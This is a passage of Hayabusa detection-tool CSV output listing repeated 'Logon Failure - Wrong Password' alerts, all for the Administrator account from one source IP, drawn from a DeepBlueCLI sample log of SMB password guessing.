Administrator | Type: 3 | Computer: Mdo5CvycGvGhn33y | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:46.171 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: heJfjLl1vbX6lMjZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:46.209 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wOP1E6hd4Jtj4gob | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:46.248 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Xa7kMCNz0bEGTBqX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:46.293 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HSxTQ4HsZt2DeYVe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:46.341 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YxHpSQwFSV4hveVM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 
+2016-09-20 01:50:46.372 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: n3OwzSPomxZLoCe6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:46.416 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: e9IfwDZIfYT6A50K | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:46.463 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JOf6DbRX4zlNqLdb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:46.508 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 00kXrnJNH40NyoYL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:46.549 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nsNHcb9pnpdRgeL7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:46.592 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ucMhgxMXy9Ch1jNm | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:46.637 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Cfi3ZaLTECJgjM9x | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:46.680 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: usugjEEBHlhJvOyu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:46.720 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WQ1pM2CVLt5ITVD5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:46.746 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NIboW7hNljF3HPpk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:46.795 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rOk5W4rkSYRRw4xS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:46.858 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: AJTfcwd8rnFc06iF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:46.930 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6sm415W5zkvjdnTV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:46.981 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KEiSbtlmW4ou1mc7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:47.012 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xWeZV5pHt94adwUy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:47.052 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5np7HeCPAFTDdTXJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:47.088 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gXbe2jEJVtwaQXlr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 
+2016-09-20 01:50:47.134 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7hZFiUCJnaBdHcw4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:47.176 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: a71wyo41KV1ZoT7p | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:47.236 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ogB17WdeOiC19rqn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:47.286 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ANOLPWG12lkW39Ei | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:47.332 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Y1vf7OUxb6TH3Q4H | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:47.368 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bxU5yumSieUzSgzH | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:47.401 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: v9K5EoWWASU8SlSe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:47.445 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PwZLRPFxaFWwjZEe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:47.500 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8fXgFFb3HTMunsoi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:47.549 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: R1RozAr1uhux4cYW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:47.586 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: n7EmuUSv03RnhKsF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:47.629 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: jw410HEW8EC3MC9f | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:47.680 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UTYp8cEbt3Yggo3J | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:47.727 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yWJVzgYLWIo7SGCZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:47.773 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DP13jPdW5Gdl8z56 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:47.813 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LNXOWjHmMDhfFVon | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:47.908 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kka1RiF3f7Nhkf8x | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 
+2016-09-20 01:50:47.959 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2o90lG6attzWU4ZN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:47.998 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PyPK9kuJdflQ4RKe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:48.028 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: a9I3El7d7anR0kIz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:48.068 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: eDUMTEfNhFuuqMle | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:48.110 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: e0F70d1WstkqnQgA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:48.148 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Bm0txApQSp1U42N3 | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:48.180 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JeEe5ENSIZnfc3FG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:48.228 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: oasE54Z1FlpswY0d | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:48.277 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Bhje1BgvxOlG28JM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:48.321 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: L9iTIv4UQ4En9RA2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:48.356 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Mg8KFm1lCeImj8Sb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:48.400 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: h17Fz1s6GJki61jg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:48.440 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6Pjjn4FAkJn4h32r | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:48.483 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ARVx3FAAww8Gmfvc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:48.533 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sYIwPg5k1wpvWobN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:48.572 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0sfhYQ54SjC4JTX7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:48.604 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nfZYnUPV40FShcqt | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 
+2016-09-20 01:50:48.648 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XYbvWVCT0tFixZTH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:48.696 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XC6Vmz0ql8myDuGa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:48.744 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PJ8JvuvZZzwSOzFo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:48.784 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: s06yKaogI6FYkXla | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:48.828 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pCjOc7PguxwNKoQR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:48.876 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BX5IosnpdYZK5xZj | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:48.905 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gfMjB1epEm64wVEX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:48.947 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pb4FVO2SKsoMyt1K | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:49.003 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1qoRw2jjFx4F6Wx6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:49.048 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ImiLeiteLoSw32I0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:49.083 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KcIYD47BIEP8gB0L | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:49.120 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: lUAeB15aWamcaZ8L | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:49.161 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KFOKiSDWc1dWjzge | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:49.211 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hqyMtzjKSJEtEAdx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:49.251 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WtHsItpyFHQxvLWm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:49.287 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RdGMqIhUGHj23Xm2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:49.328 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BfE5LVmrPaAFLwBR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 
